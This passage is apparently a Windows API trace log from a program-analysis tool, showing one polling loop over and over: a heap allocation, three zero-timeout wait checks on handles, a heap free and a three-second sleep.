	[0220.771] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
	[0220.772] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0220.772] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0220.772] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0220.772] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fb0) returned 1
	[0220.772] Sleep (dwMilliseconds=0xbb8) 
	[0220.867] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
	[0220.867] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0220.867] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0220.867] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0220.867] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fb0) returned 1
	[0220.867] Sleep (dwMilliseconds=0xbb8) 
	[0220.882] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
	[0220.882] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0220.882] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0220.882] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0220.882] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fb0) returned 1
	[0220.882] Sleep (dwMilliseconds=0xbb8) 
	[0220.898] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
	[0220.898] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0220.898] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0220.898] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0220.898] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fb0) returned 1
	[0220.899] Sleep (dwMilliseconds=0xbb8) 
	[0220.913] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
	[0220.913] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0220.913] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0220.913] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0220.914] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fb0) returned 1
	[0220.914] Sleep (dwMilliseconds=0xbb8) 
	[0220.929] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
	[0220.929] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0220.929] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0220.929] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0220.929] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fb0) returned 1
	[0220.929] Sleep (dwMilliseconds=0xbb8) 
	[0220.945] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
	[0220.945] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0220.946] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0220.946] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0220.946] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fb0) returned 1
	[0220.946] Sleep (dwMilliseconds=0xbb8) 
	[0221.006] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
	[0221.006] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0221.006] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0221.006] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0221.006] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fb0) returned 1
	[0221.006] Sleep (dwMilliseconds=0xbb8) 
	[0221.039] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
	[0221.039] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0221.039] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0221.039] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0221.039] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fb0) returned 1
	[0221.039] Sleep (dwMilliseconds=0xbb8) 
	[0221.075] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
	[0221.075] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0221.075] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0221.075] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0221.075] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fb0) returned 1
	[0221.075] Sleep (dwMilliseconds=0xbb8) 
	[0221.084] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
	[0221.084] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0221.084] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0221.084] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0221.084] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fb0) returned 1
	[0221.084] Sleep (dwMilliseconds=0xbb8) 
	[0221.100] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
	[0221.100] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0221.100] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0221.100] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0221.100] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fb0) returned 1
	[0221.100] Sleep (dwMilliseconds=0xbb8) 
	[0221.115] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
	[0221.115] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0221.115] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0221.115] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0221.116] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fb0) returned 1
	[0221.116] Sleep (dwMilliseconds=0xbb8) 
	[0221.131] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
	[0221.131] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0221.131] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0221.131] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0221.131] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fb0) returned 1
	[0221.131] Sleep (dwMilliseconds=0xbb8) 
	[0221.147] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
	[0221.147] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0221.147] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0221.147] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0221.147] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fb0) returned 1
	[0221.147] Sleep (dwMilliseconds=0xbb8) 
	[0221.163] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
	[0221.163] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0221.163] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0221.163] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0221.163] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fb0) returned 1
	[0221.163] Sleep (dwMilliseconds=0xbb8) 
	[0221.224] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
	[0221.224] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0221.224] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0221.224] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0221.224] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fb0) returned 1
	[0221.224] Sleep (dwMilliseconds=0xbb8) 
	[0221.272] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
	[0221.272] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0221.272] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0221.272] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0221.272] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fb0) returned 1
	[0221.272] Sleep (dwMilliseconds=0xbb8) 
	[0221.310] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
	[0221.310] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0221.310] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0221.310] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0221.310] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fb0) returned 1
	[0221.310] Sleep (dwMilliseconds=0xbb8) 
	[0221.318] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
	[0221.318] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0221.318] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0221.318] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0221.318] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fb0) returned 1
	[0221.318] Sleep (dwMilliseconds=0xbb8) 
	[0221.333] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
	[0221.333] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0221.334] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0221.334] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0221.334] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fb0) returned 1
	[0221.334] Sleep (dwMilliseconds=0xbb8) 
	[0221.349] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
	[0221.349] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0221.349] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0221.349] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0221.349] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fb0) returned 1
	[0221.349] Sleep (dwMilliseconds=0xbb8) 
	[0221.365] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
	[0221.365] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0221.365] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0221.365] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0221.365] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fb0) returned 1
	[0221.365] Sleep (dwMilliseconds=0xbb8) 
	[0221.381] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
	[0221.381] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0221.381] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0221.381] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0221.381] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fb0) returned 1
	[0221.381] Sleep (dwMilliseconds=0xbb8) 
	[0221.396] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
	[0221.396] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0221.396] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0221.396] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0221.396] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fb0) returned 1
	[0221.396] Sleep (dwMilliseconds=0xbb8) 
	[0221.474] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
	[0221.474] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0221.474] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0221.474] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0221.474] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fb0) returned 1
	[0221.474] Sleep (dwMilliseconds=0xbb8) 
	[0221.521] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
	[0221.521] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0221.521] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0221.521] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0221.521] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fb0) returned 1
	[0221.521] Sleep (dwMilliseconds=0xbb8) 
	[0221.563] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
	[0221.563] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0221.563] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0221.563] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0221.563] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fb0) returned 1
	[0221.563] Sleep (dwMilliseconds=0xbb8) 
	[0221.567] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
	[0221.567] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0221.567] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0221.567] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0221.567] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fb0) returned 1
	[0221.567] Sleep (dwMilliseconds=0xbb8) 
	[0221.583] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
	[0221.583] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0221.583] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0221.583] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0221.583] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fb0) returned 1
	[0221.583] Sleep (dwMilliseconds=0xbb8) 
	[0221.599] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
	[0221.599] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0221.599] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0221.599] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0221.599] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fb0) returned 1
	[0221.599] Sleep (dwMilliseconds=0xbb8) 
	[0221.616] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
	[0221.616] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0221.616] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0221.616] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0221.616] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fb0) returned 1
	[0221.616] Sleep (dwMilliseconds=0xbb8) 
	[0221.630] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
	[0221.630] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0221.630] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0221.630] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0221.631] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fb0) returned 1
	[0221.631] Sleep (dwMilliseconds=0xbb8) 
	[0221.647] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
	[0221.647] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0221.647] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0221.647] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0221.647] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fb0) returned 1
	[0221.647] Sleep (dwMilliseconds=0xbb8) 
	[0221.708] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
	[0221.708] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0221.708] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0221.708] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0221.708] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fb0) returned 1
	[0221.708] Sleep (dwMilliseconds=0xbb8) 
	[0221.755] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
	[0221.755] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0221.755] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0221.755] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0221.755] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fb0) returned 1
	[0221.755] Sleep (dwMilliseconds=0xbb8) 
	[0221.788] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
	[0221.788] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0221.788] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0221.788] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0221.788] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fb0) returned 1
	[0221.788] Sleep (dwMilliseconds=0xbb8) 
	[0221.818] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
	[0221.818] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0221.818] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0221.818] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0221.818] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fb0) returned 1
	[0221.818] Sleep (dwMilliseconds=0xbb8) 
	[0221.833] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
	[0221.833] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0221.833] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0221.833] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0221.833] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fb0) returned 1
	[0221.833] Sleep (dwMilliseconds=0xbb8) 
	[0221.849] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
	[0221.850] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0221.850] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0221.850] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0221.850] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fb0) returned 1
	[0221.850] Sleep (dwMilliseconds=0xbb8) 
	[0221.879] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
	[0221.879] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0221.879] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0221.879] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0221.879] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fb0) returned 1
	[0221.879] Sleep (dwMilliseconds=0xbb8) 
	[0221.945] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
	[0221.945] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0221.945] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0221.945] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0221.945] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fb0) returned 1
	[0221.945] Sleep (dwMilliseconds=0xbb8) 
	[0221.989] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
	[0221.989] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0221.989] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0221.989] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0221.989] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fb0) returned 1
	[0221.989] Sleep (dwMilliseconds=0xbb8) 
	[0222.026] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
	[0222.026] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0222.026] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0222.026] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0222.026] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fb0) returned 1
	[0222.026] Sleep (dwMilliseconds=0xbb8) 
	[0222.036] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
	[0222.036] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0222.036] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0222.036] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0222.036] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fb0) returned 1
	[0222.036] Sleep (dwMilliseconds=0xbb8) 
	[0222.051] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
	[0222.051] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0222.051] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0222.052] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0222.052] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fb0) returned 1
	[0222.052] Sleep (dwMilliseconds=0xbb8) 
	[0222.067] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
	[0222.067] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0222.067] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0222.067] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0222.067] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fb0) returned 1
	[0222.067] Sleep (dwMilliseconds=0xbb8) 
	[0222.083] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
	[0222.083] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0222.083] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0222.083] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0222.083] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fb0) returned 1
	[0222.083] Sleep (dwMilliseconds=0xbb8) 
	[0222.099] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
	[0222.099] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0222.099] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0222.099] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0222.099] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fb0) returned 1
	[0222.099] Sleep (dwMilliseconds=0xbb8) 
	[0222.114] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
	[0222.114] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0222.114] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0222.114] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0222.114] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fb0) returned 1
	[0222.114] Sleep (dwMilliseconds=0xbb8) 
	[0222.176] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
	[0222.176] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0222.176] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0222.176] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0222.176] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fb0) returned 1
	[0222.176] Sleep (dwMilliseconds=0xbb8) 
	[0222.223] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
	[0222.223] WaitForSingleObject (hHandle=0x474, dwMilliseconds=0x0) returned 0x0
	[0222.223] WaitForSingleObject (hHandle=0x49c, dwMilliseconds=0x0) returned 0x0
	[0222.223] WaitForSingleObject (hHandle=0x4b0, dwMilliseconds=0x0) returned 0x0
	[0222.223] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x2777fb0) returned 1
	[0222.223] Sleep (dwMilliseconds=0xbb8) 
	[0222.251] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x2777fb0
